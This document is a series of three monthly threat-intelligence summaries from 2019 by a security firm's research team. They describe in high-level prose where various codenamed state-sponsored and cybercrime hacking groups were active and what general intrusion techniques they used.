Monthly Threat Actor Group Intelligence Report, September 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from August 21 to September 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, and SectorA07, were found among SectorA hacking groups this September.

The parallel requirements of the hacking activities of SectorA hacking groups, which continues to date, is to both collect high-quality information related to government activities such as political and diplomatic activities related to South Korea or related to SectorA relief organizations, and to illegally profit from crimes around the world. The purpose of this hacking has been continued for a long time, and for this strategic hacking purpose, it is expected to continue without change for the time being.

The hacking activities of the SectorA01, SectorA05 and SectorA07 groups discovered in September were related to collecting high-level information such as political and diplomatic activities related to South Korea.

SectorA01 group activity was found in South Korea, Germany, the United States, China, and Austria, and used malware in the form of files of Hangul software files, which is widely used by South Korean government agencies.

SectorA05 group activity was found in United States, South Korea, Peru, Belgium, France, China, Japan, the United Kingdom, Slovakia, Russia and Poland. The hacking technique used by the group was spear phishing emails to deliver malware in the form of Microsoft Word files to the target of attack. The lure document had a topic related to SectorA’s economic sanctions, nuclear development, and submarines.

SectorA07 group activity was found in South Korea, Italy, Vietnam, Japan, and Brazil. During that time, the attacker used a Windows executable file with a file name associated with a MOU contract with the Department of Defense. The file was disguised using the icon of Microsoft Word.

2. SectorB Activity Features

A total of eight hacking groups, SectorB01, SectorB03, SectorB09, SectorB11, SectorB14, SectorB19, SectorB20, and SectorB21, were found among SectorB hacking groups this September.

The hacking activities of the SectorB groups discovered to date have been found in Southeast Asia (including Thailand, Singapore, Indonesia, Philippines, Vietnam, Malaysia and India), the Middle East (including Turkey), East Asia (including Taiwan, Macau, Hong Kong, Japan and South Korea), North America (including the United States), and Europe (including the United Kingdom and Russia). In addition, hacking activity was discovered in the Uyghur region, which we believe was targeted for political purposes.

The SectorB hacking groups use spear phishing, which uses document files that exploit N-day vulnerabilities in Microsoft Office as attachments. This method of intrusion is common for them when targeting developing countries such as Southeast Asia.

In addition, the SectorB21 group performed hacking activities using Android malware to steal high-level information from smartphones of specific people in the Uyghur region.

Since the hacking activities of the SectorB group discovered in September are mostly concentrated in Southeast Asia, it appears to be closely related to the political and diplomatic activities of the SectorB government. Thus, the hacking activity of SectorB group is expected to continue especially in Southeast Asia and Europe.

3. SectorC Activity Features

A total of two hacking groups, SectorC01 and SectorC08, were found among SectorC hacking groups this September.

SectorC01 group activity was found in Europe and North America (including Ukraine, Canada, Belgium and the United Kingdom), while SectorC08 group activity was found in Ukraine, China, the United States, South Korea and Brazil. The SectorC08 group used to hack only in Europe in the past, but this is the first time that hacking activity has been found in East Asia (including China and South Korea), and additional analysis of their purpose is required. Although the SectorC groups, where hacking activity was found, use different hacking techniques, their spear phishing emails display common characteristics.

The SectorC01 group attaches Microsoft Word document malware to spear phishing emails and uses remote template injection techniques to deliver malware in Microsoft Word files containing macro scripts to their targets.

Similar to past hacking cases, the SectorC08 group maintains their traditional hacking approach using spear phishing emails with 7ZipSPX compressed files attached. However, we also confirmed that their hacking activity uses the remote template injection method, and the text content of the lure document used for the template injection was related to a specific conference.

The SectorC groups have many varied attack techniques because of their long history, and they are likely to continue a similar form of hacking in the future, as they continue to do so in line with the political objectives of the SectorC government.

4. SectorD Activity Features

A total of six hacking groups, SectorD01, SectorD02, SectorD05, SectorD10, SectorD14, and SectorD15 were found among SectorD hacking groups this September.

SectorD hacking groups targeted countries which are political rivals with the SectorD government. Their hacking activity discovered in September targeted countries located in the Middle East (including Morocco, Kuwait and the United Arab Emirates), and other hacking targets were the United States, the United Kingdom, Canada, India, the Netherlands, the Philippines, Azerbaijan, Kenya, China, Australia, Hong Kong and Switzerland.

The basic hacking techniques of the SectorD groups are similar to the previous cases – sending a Microsoft Word file with a malicious macro to the hacking target using an attachment in a spear phishing email. In addition to these hacking techniques, the SectorD05 group has launched attacks against researchers from the United States, Middle East, and France, focusing on academic research on SectorD, or performing phishing attacks against people targeting SectorD dissidents in the United States.

The SectorD10 group also uses links in phishing emails to direct targets to spoofing sites that are disguised as user login pages, and perform hacking activities to steal user credentials entered by targeted individuals.

The SectorD15 group conducted hacking activity aimed at gathering information on IT suppliers located in Saudi Arabia, which is likely to lead to a supply chain attack.

At the moment, diplomatic measures involving the SectorD government are underway in Western countries, mainly the United States. Such diplomatic activities could eventually lead to physical conflicts between countries, and it may be that these hacking activities are being used in cyberspace as preliminary reconnaissance.

5. SectorE Activity Features

A total of three hacking groups, SectorE02, SectorE03, and SectorE05 were found among SectorE hacking groups this September. The activities of the SectorE hacking groups were discovered in September in Europe (including Belgium, Portugal, United Kingdom, France and the Russia), Southeast Asia (including Singapore, Sri Lanka, Philippines, Thailand), East Asia (including Taiwan and China), North America (including United States and Canada), and Central Asia (including Pakistan and Turkmenistan).

SectorE hacking groups mainly conducted hacking activities targeting countries that are politically competitive with the SectorE government, but recently the range of geographical hacking activities of these groups is gradually widening.

The basic hacking techniques of the SectorE groups use attached documents in spear phishing emails, which could be a Microsoft Office document with a malicious macro functionality or previously known code execution vulnerabilities, or files from InPage software that are only frequently used in certain regions. They hosted malware in the form of Microsoft Word document that contain macro scripts on a specific domain. The document performs a remote template injection which would query the server to download the additional macro template from the attacker’s domain.

As the SectorE Group geographical radius of activity appears to be widening, they will likely continue to evolve and develop new hacking techniques. In past cases, whenever the geographic radius of hacking groups’ targets expanded, so did their hacking skills.

6. SectorF Activity Features

Hacking activity of the SectorF01 group was discovered this September, and the hacking activity was found in Asia (including Vietnam, China, Cambodia and Japan), and in Europe (including the United Kingdom and Germany).

The hacking activity found in September included a malware that has a similarity to a previously found malware, and is a RAR compressed file consisting of an executable file disguised as an Microsoft Word icon and a malicious DLL file, similar to the existing hacking technique. The SectorF01 group uses the DLL side loading technique to carry out the attack. When the executable file disguised as Microsoft Word program is executed, the DLL in the folder is loaded and executed.

As there have been many cases where their hacking activity has been discovered in regions including SectorF in the past, it is possible to consider hacking activities aimed at people who are opposed to political activities of the SectorF government. However, as hacking activities are also being conducted for the purpose of economic development in SectorF, additional analysis needs to be done while tracking their hacking activity areas and hacking targets.

6. SectorH Activity Features

Hacking activity of the SectorH01 group was discovered this September, but this is relatively infrequent unlike other government supported hacking groups.

SectorH01’s hacking activity was discovered in September, and their hacking activity was found in India, Kenya, Georgia, China, South Korea, Hong Kong, New Zealand and Canada. The SectorH01 group distributes malware in Microsoft Excel file formats containing macro scripts through spear phishing emails. The macro script executes JavaScript code hosted in Pastebin, which uses PowerShell to transfer the injector and DLL-type files to be injected into the infected system and then executes autorun registration for persistence.

The SecotorH01 group’s increased and broadening hacking activity highlight the dynamics of competition between SectorE and SectorH. It is important to pay close attention to the future competition between the two countries as to whether this increased hacking activity will affect the international situation in the future.

7. Cyber Crime Activity Features

Hacking activity of the SectorJ01, SectorJ02, SectorJ04, SectorJ05, and SectorJ09 group was discovered this September.

Unlike most other government-sponsored hacking groups, SectorJ groups seize information of financial value to make money in the real world, directly hack specific companies and organizations and run ransomware on their internal networks, or seize important industrial secrets in order to intimidate and extort victims.

SectorJ01 group activity was found in the United States, Russia, France, Bulgaria, China, United Kingdom, Poland, Germany, India, and Romania. The group used executables disguised as installers for Chrome or Firefox browsers, and used the NSIS (Nullsoft Scriptable Install System) to combine malware and normal browser installation files into one executable format.

SectorJ02 group activity was found in the United Kingdom and United States. They sent a spear phishing email to the target containing a link to download a JavaScript backdoor. When the malware is installed, it resides in memory and when the victim accesses an online payment page, skimming code would be injected into the HTML Document Object Model and collects payment information that the user types in.

SectorJ04 group activity was found in a wide range of locations – Europe (including Italy, Poland, Denmark, United Kingdom, Slovenia, Greece), East Asia (including South Korea, Japan), Middle East (including United Arab Emirates), Argentina, Philippines, Canada, India, Malaysia and the United States.

The group has been using spam emails with Office-themed Microsoft Excel or Word documents attached in the past for a while, installing malware on the infected system which transmits the information collected from the infected system to a specific server.

SectorJ05 group activity was found in the United Kingdom, Hong Kong, China, Germany, India, Netherlands, Sri Lanka, Belarus, the United States, and Russia. They primarily used malicious documents containing macro scripts, CHM files, or malicious attachment in the form of LNK shortcut files.

SectorJ09 group activitywas found in Italy. They launched an attack on e-commerce service providers, injecting JavaScript into the payment page of the hotel’s website using a particular e-commerce service to load the remote script. Only when accessing the page from a mobile device, a skimmer script is loaded to steal credit card information.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, August 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from July 21 to August 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA04 and SectorA07 were found among SectorA hacking groups this August. Two parallel requirements of SectorA hacking groups are collecting high-quality information related to South Korean political and diplomatic activities and to obtain illegal monetary benefit by targeting anywhere in the world.

SectorA01 group activity was found in South Korea, the Philippines, Argentina, Pakistan, United States and Nepal. SectorA02 group activity has been found in South Korea and the United States. SectorA4 group, which had not been found for a while, was found in South Korea, and malware was discovered using a digital signature issued by a Korean security company. Sector07 group activity was found in South Korea, Indonesia, United States, Russian Federation and Germany.

The activities of the four SectorA-related hacking groups discovered in August common use Spear Phishing as an attack vector. However, SectorA01 uses Hangul files (HWP) as attachments in South Korea, and only other SectorA02, SectorA04, and SectorA07 groups use Microsoft Word files containing macro function as an attachment to its Spear Phishing emails.

The SectorA02 group produces mobile malware designed to run on Android smartphones and uses it for hacking activities.

The SectorA groups aim to seize high-level information related to South Korea’s political, diplomatic and North Korean relief organizations. Due to large-scale economic sanctions surrounding SectorA, their hacking groups carry out hacking activities to steal financial information in other countries, including South Korea. These operations take place in parallel. and SectorA groups are expected to continue hacking with the purpose.

2. SectorB Activity Features

Among the SectorB groups, a total of five hacking groups, SectorB01, SectorB03, SectorB04, SectorB06 and SectorB07 group were found among SectorB hacking groups this August.

The hacking activity range of the SectorB01 group discovered so far has been the widest in the history of this hacking group. Their activity was found in Asia (including South Korea, Japan, Singapore, Vietnam, Malaysia, Hong Kong, Taiwan, Thailand, Myanmar, India), the Middle East (Turkey) and Africa (including South Africa), North America (including the United States and Canada) and Europe (including France, United Kingdom, Ireland, Germany, Switzerland, Netherlands, Italy, Czech republic, and Ukraine).

SectorB03 group activity was found in the United Arab Emirates, the United States, Japan and Taiwan.

SectorB04 group activity was found in Russian Federation, United States, United Kingdom, Turkey, Spain, South Korea, Malaysia and Taiwan.

The SectorB06 group has been found in the Russian Federation and Belarus.

SectorB07 group has been found in South Korea, Germany, United States and India.

Most of the SectorB hacking groups use Spear Phishing with document files as attachments to exploit vulnerabilities in Microsoft Office.

SectorB group’s hacking activities discovered in August are mostly concentrated in Asia, Europe and North America, and this is closely linked to its activities to obtain information about its country’s diplomatic and economic information related to an ongoing trade war with the United States.

3. SectorC Activity Features

Among the SectorC groups, the activities of three hacking groups, SectorC02, SecotorC03 and SectorC08 were found among SectorC hacking groups this August.

The hacking activity of SectorC02 group has been found in Brazil, Georgia.

The hacking activity of SectorC03 group has been found in United States and United Kingdom.

The hacking activity of SectorC08 group has been found in Ukraine, United Kingdom, Belarus, Sweden, Argentina, United States and China.

The SectorC groups used different attack vectors. SectorC02 group stole sensitive email information from internal Microsoft Exchange servers connected to the Internet while the SecotorC03 and SectorC08 groups used spear phishing emails with malware as their primary hacking technique, similar to their other hacking activities found in the past.

However, the SectorC08 group has the characteristic of using 7ZipSfx compressed files as attachments to specific hacking targets.

The SectorC groups have many more attack technique at their disposal than threat actors of other groups because of their long history. Recently, they have been working to achieve the political objectives of their government, and this is expected to continue.

4. SectorD Activity Features

Among the SectorD groups, the activities of two hacking groups, SectorD02, SecotorD14 were found among SectorD hacking groups this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of SectorD14 group has been found in Canada, United States, United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities on Industrial Control Systems (ICS) owned by government agencies, and natural gas and oil companies related to countries located in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group’s government are under way in Western countries, mainly in the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber wars with physical conflicts between the Middle East and Western countries.

5. SectorE Activity Features

Among the SectorE groups, the activities of three hacking groups, SectorE01, SecotorE02 and SectorE04 were found among SectorE hacking groups this August.

The hacking activity of SectorE01 group was found in Poland, Germany and the United Kingdom.

The hacking activity of SectorE02 group was found in Pakistan, United Kingdom, United States, Ukraine, Netherlands and the Germany.

The hacking activity of SectorE04 was found in China.

SectorE hacking groups have mainly been conducting hacking activities targeting countries that are politically competitive with SectorE group’s government, but the range of geographical hacking activities of these groups is gradually widening.

The hacking groups discovered in August mainly used spear phishing, attaching document files that exploited known Microsoft Word vulnerabilities or containing malicious macro code.

The SectorE groups are expanding their range of activity, and their recent activities have been found frequently in East Asia. In addition, it is highly likely that they will continue to develop new hacking techniques by copying techniques of other hacking groups or through their own research process.

6. SectorF Activity Features

August hacking activity of the SectorF01 group has been found in Cambodia, China, South Korea, Japan, United States, Ireland, Russian Federation, and Australia. They used malware that is highly similar to the ones found in the past, and spear phishing emails with document files containing malicious macro code as attachments are sent to their targets.

In the past, there have been many cases where their hacking activity have been discovered in the Southeast Asia region, and recently, their hacking activities have been carried out for the purpose of economic development of their country. The hacking activity radius of this hacking group is expected to gradually increase and it is necessary to continue further analysis based on their hacking activity areas and targets.

7. Cyber Crime Activity Features

In August, a total of six hacking groups, SectorJ01, SectorJ04, SectorJ07, SectorJ10, SectorJ12 and SectorJ13, were found among the Cyber Crime Groups. Unlike other government-backed hacking groups, they collect information such as Credit Card information that can be monetized in the real world. They also hack organizations to spread ransomware on their internal network, or steal important industry secrets to sell them online.

The hacking activity of SectorJ01 group has been found in the Russian Federation, Romania, United Kingdom, Costa Rica and United States. The SectorJ01 Group is conducting hacking campaigns in Europe and North America this August. They collect various types of personal and corporate information that exists inside infected PCs from malware distributed through the spear phishing email.

The hacking activity of SectorJ04 group has been found in United Kingdom, United States, South Korea, Germany, Turkey, France, Bulgaria, Serbia, India, Canada, Argentina, Bangladesh and Hong Kong. They mainly hack into companies in various industries including transportation, universities, government agencies, manufacturing, semiconductors, online commercials, chemicals, and health. In the first half of 2019, they intensively hacked organizations in Asia, but their recent trend seems to be to move hacking activity back to Europe and North America.

The hacking activity of SectorJ07 group has been found in China, United States and Ukraine. They mainly produce malware that runs on Linux that can mine cryptocurrencies on high-performance servers utilized by companies.

The hacking activity of SectorJ10 group has been found in Philippines and United States. Attacks are carried out using spear phishing emails containing malware in the form of document files which have malicious macro code included inside. The macro calls to the Windows Management Instrumentation Command-line (WMIC), and the WMIC finally executes a malicious PowerShell script.

SectorJ12 group conducted hacking activities targeting energy, entertainment, consulting and manufacturing companies located in France, Taiwan and Poland. The spear phishing email have an ACE archive attached, and this ACE archive contains the Visual Basic Script (VBScript) for getting the malicious PowerShell script from the attacker’s server.

The hacking activity of SectorJ13 group has been found in South Korea, Ukraine and United Kingdom. They send spear phishing emails with document files containing malicious macro code attached. When executing the Word document, the macro script uses a technique to download additional malware from the attacker’s server by running PowerShell. SectorJ13 was previously only active in Europe, but its activity was recently found in Korea as well. This is a group that needs to be watched closely if it is targeting South Korea with similar intent and purpose as the SectorJ04 group.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, June 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from May 21 to June 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, SectorA05 were found among SectorA hacking groups this June. The SectorA group was mainly active in the Middle East, Southeast Asia, and East Asia in June, targeting countries such as Jordan, Philippines, South Korea, and Japan.

The SectorA01 group mainly sent spear phishing emails to the Middle East and Southeast Asia which had Microsoft Office document files attached to them. However, in June, another case was discovered where they attached executable type malware that was disguised as a job application form.

The SectorA02 and SectorA05 groups are active mainly for monetary profit but based on their hacking techniques and malware features, each groups are aimed at different targets. The SectorA02 group mainly targets financial companies or companies related to cryptocurrency trading, but the SectorA05 group targets individuals who hold cryptocurrency. In the past, the two groups used spear phishing emails which attached malicious HWP or executable files. Recently, they have also used spear phishing emails impersonating cryptocurrency exchanges or government agencies.

Recently, the SectorA groups have been acting in parallel to target both diplomatic information related to their government and gain monetary benefits. In the past, they mainly targeted financial companies and cryptocurrency exchanges in order to earn monetary benefits. but nowadays they extended their range of hacking targets to include individual holders of cryptocurrency. Attention is needed as their range of activities expand.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In June, a total of six hacking groups were found to be active in SectorB. Activities of each group were found in the following countries: SectorB01 group activity was discovered in Southeast Asia and Europe, mainly in the Philippines, Netherlands, and Ukraine. SectorB03 group activity was discovered in the Middle East, mainly in Saudi Arabia. SectorB04 group activity was discovered in East Asia, Middle East and Europe, mainly in Taiwan, Philippines, Turkey, and Austria. SectorB06 group activity was discovered in the Middle East, mainly in Turkey and Kazakhstan. SectorB09 group activity was discovered in East Asia and North America, mainly in Japan, Hong Kong, Taiwan and Canada. SectorB14 group activity was discovered in East Asia and North America, mainly in the South Korea and the United States.

They maintain their existing hacking techniques – using Spear Phishing emails with malicious Microsoft Office document files attached. Recently, they also attacked Microsoft SharePoint servers and MySQL servers that are connected to the Internet using new vulnerabilities and web shells. In addition, new malware targeting the Linux operating system has been found.

In the past, SectorB groups focused more heavily on North America, but recently attacks in the Middle East, Southeast Asia and East Asia have also increased. We believe this is related to their recent political and diplomatic situations and it is likely that the hacking activities in the Middle East, Southeast Asia, East Asia will continue for the time being.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC08, SectorC11 were found among the SectorC groups in June. They were active mainly in Europe – Moldova, Ukraine and Germany – where they frequently have political friction with. They are constantly using spear phishing emails with malware, but there are gradual changes in the characteristics of the attached executable files. They continue to use open source programs such as the remote control programs, UltraVNC, and start to develop their malware with open source code. This is presumably done to bypass security solutions and analyst detection, and also interferes with intelligence analysis efforts to track attackers. SectorC groups are expected to continue hacking activities in countries which it has political and diplomatic conflicts with for the time being.

4. SectorD Activity Features

In June, a total of two hacking groups were found among SectorD groups. They targeted countries in the Middle East which they have a politically competitive relation with. Activities of each group were found in the following countries: SectorD02 group activity was discovered extensively in Middle Asia to Middle East, mainly in Hong Kong, Sweden, Tajikistan, United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, United States and Mexico. SectorD11 group activity was discovered in Middle Asia to Middle East.

They are constantly using spear phishing emails attached to Microsoft Office document files. In particular, obfuscated macro scripts and PowerShell code are embedded in these document files to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilian who are against SectorD government.

Currently, the SectorD hacking groups have increased the frequency of hacking activities against Western countries. This is mainly targeting the United States, which they have political and military disputes with, but also a pro-American nation in the Middle East. It is likely that the activities of SectorD hacking groups will be greatly dependent on how the US exerts its influence and military activities in the future.

5. SectorF Activity Features

The SectorF01 group was discovered performing hacking activities in Southeast Asia, Europe and North America, including Vietnam, United Kingdom and the United States. They have consistently used spear phishing emails with attached Microsoft Office document files, but recently attached compressed files containing obfuscated HTA script files as well. This bypasses the detection of security solutions using script-based malware and avoids making the target suspicious as it launches normal documents when running the HTA file.

Analysis of the recent hacking activity of SectorF01 shows they seem to have two purposes. The first is surveillance of organizations and individuals who are against their government. The second is the collection of high-tech info from advanced countries that are nurturing high-tech and industrial technologies, which assists their government’s economic development and upgrading purposes. Recently, the hacking activity of SectorF01 for the purpose of high-tech corporate espionage is increasing, and it is likely that their activities targeting high tech companies and countries will continue to increase in the future.

6. SectorH Activity Features

The SectorH01 group appears to be active as a contractor rather than belonging officially to a national security agency. Their hacking activities were found in Southeast Asia and South America, including India and Brazil. They mainly use spear phishing emails with Microsoft Office document files.

In this case, macro scripts within document files make use of PowerShell to download additional scripts from Pastebin (a text file storage site). This minimize the exposure of their next stage payload even if their initial malware is detected by a security solution, and can bypass the detection of security solution by using an external web site which is open to the Internet for distribution of their malware. SectorH01 group’s hacking activities were mainly carried out on their political competitor, India. However, recently their activities have been found in other regions, and we will continue monitoring them in order to further understand the purpose of the SectorH group.

7. Cyber Crime Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In June, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ01 group are mainly found in China, Germany, Slovenia, Sweden, Romania, Russia, US, Brazil, and Costa Rica. The SectorJ01 group uses Spear Phishing emails which have attached documents that utilize known code execution vulnerabilities in Microsoft Office. They also use Cobalt Strike, a common penetration testing tool.

SectorJ04 Group is one of the most active groups in recent years, and its activities have been found in a wide range of regions: Europe, Asia, North and South America, Africa. Specific countries include Switzerland, Russia, Macedonia, France, Ukraine, Italy, Germany, France, South Korea, Philippines, Taiwan, China, USA, Ecuador, and Senegal.

Similar to the past, they use spear phishing emails which have attached Microsoft Office document files with embedded macro scripts that will download malware. Sometimes they use HTML file attachments too. Recently, the SectorJ04 group hacked organizations such as universities, manufacturing companies, and construction companies, so their targets were not limited to just financial companies anymore. They have also extended their activities to industrial areas, where the security posture is typically relatively weaker compared to financial companies, so this is one way they are attempting to generate high profits through low effort. As SectorJ04 group’s hacking targets are diversified, it is likely that many cases of financial losses will occur in various countries across many industries.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.